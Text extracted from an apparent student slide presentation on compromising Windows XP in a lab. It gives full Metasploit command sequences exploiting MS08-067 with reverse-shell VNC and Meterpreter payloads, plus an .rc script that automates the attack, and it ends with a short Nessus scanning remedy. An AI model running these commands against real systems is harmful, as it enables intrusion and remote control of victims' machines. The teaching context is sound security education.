Compromising windows XP and

RemediesBikrant Gautam, MSIASt. Cloud State University

Overview✘ Terminologies explained✘ Deploying attack✘ Automating attacks✘ Mitigating measures✘ Conclusion

Methodology Overview

● Probe target● Find vulnerabilities● Pass information to

exploit

● Find target● Find Vulnerability● Load Exploit● Load Payload● Setup Listener● Exploit

Scanning

Attacking

Targeting Victims The victim, name: bikrant1 ip: 192.168.1.9

The Attacker, target- vulnerable

Launching the Attack (visual)

Result ===>

Victim OSeverything user does on this computer is visible to the attacker once the exploit is successful

Attacking SystemEverything victim does is seen from Kali Linux using TightVNC console.

Exploit Code:> sudo msfconsole> use exploit/windows/smb/ms08_067_netapi> set target 0> set rhost 192.168.1.9> set lhost 192.168.1.6> set lport 4321> set payload windows/vncinject/reverse_tcp> check> exploit

Attack continued(console)Using MeterPreterExploit Script> sudo msfconsole> use exploit/windows/smb/ms08_067_netapi> set target 0> set rhost 192.168.1.9> set lhost 192.168.1.6> set lport 4321> set payload windows/meterpreter/reverse_tcp> check> exploit

● Different than previous one● Has access to the command line ● Can create/delete or even execute new

scripts or command

Automating the AttackUsing bash script to automate the attacksrequirement: > script needs to be created at specific folder of metasploit framework.> script once written can be invoked with msfconsole command.-----------------------------------------------------------------> go to location: usr/share/metasploit-framework/scripts/meterpreter> create a file meterpreter.rc using nano or touch> include the following script:use exploit/windows/smb/ms08_067_netapiset target 0set rhost 192.168.1.9set lhost 192.168.1.10set lport 4321set payload windows/vncinject/reverse_tcpexploit

Automating the Attack (2)Using python to automate attackcomplex requirement: > need to download correct library to initiate attack.> package is msfrpc from github> execute similar action as from bash scripting

-----------------------------------------------------------------Difference from Bash Script:> Difficult to implement. > Depends on python version. > Code cannot be run in other system without setting up complete environment.

Initializing the attack

Preventing the AttackScanning for Vulnerabilities using Nessus

> scan the device (provide IP to Nessus)> run the scan> drill down on the critical and high vulnerabilities> read the description and adopt the solution suggested

Conclusion● Security is evolving process.● New vulnerabilities are introduced each day● Penetration and scanning helps you see what’s wrong

with your system● Helps you understand what can be done once the

exploit is executed● “Best defense can only be implemented once you

know your weakest point”

Questions?